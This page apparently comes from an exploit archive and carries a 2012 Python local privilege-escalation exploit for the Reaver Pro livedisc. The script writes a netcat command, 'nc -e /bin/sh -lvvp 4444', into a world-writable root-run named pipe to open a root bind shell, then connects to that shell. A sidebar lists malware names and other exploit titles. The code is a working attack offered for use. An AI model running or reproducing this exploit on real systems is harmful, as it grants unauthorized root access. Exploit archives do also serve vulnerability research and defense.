Reaver Pro Livedisc Code Execution

Posted on 30 September 2012

#!/usr/bin/env python
import os
print """
 Reaver Pro Local Root
 Exploits a hilarious named pipe flaw.
The named pipe /tmp/exe is open to anyone...
Any command echoed into it gets ran as root.
This simply launches a bindshell on 4444...
 Insecurety Research | insecurety.net
"""
print ""
print "This is why TacNetSol should hire me?"
print "[+] Sending command to named pipe..."
cmd = '''echo "nc -e /bin/sh -lvvp 4444" >> /tmp/exe'''
os.system(cmd)
print "[+] Connecting to bind shell, enjoy root!"
os.system("nc -v localhost 4444")

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Faronics WINSelect Hardcoded Credentials / Bad Permissions / Unhashed Password
Paradox IP150 Internet Module 1.40.00 Cross Site Request Forgery
Student Attendance Management System 1.0 SQL Injection
Carbon Forum 5.9.0 Cross Site Request Forgery / SQL Injection
Flatboard 3.2 Cross Site Scripting

Last 20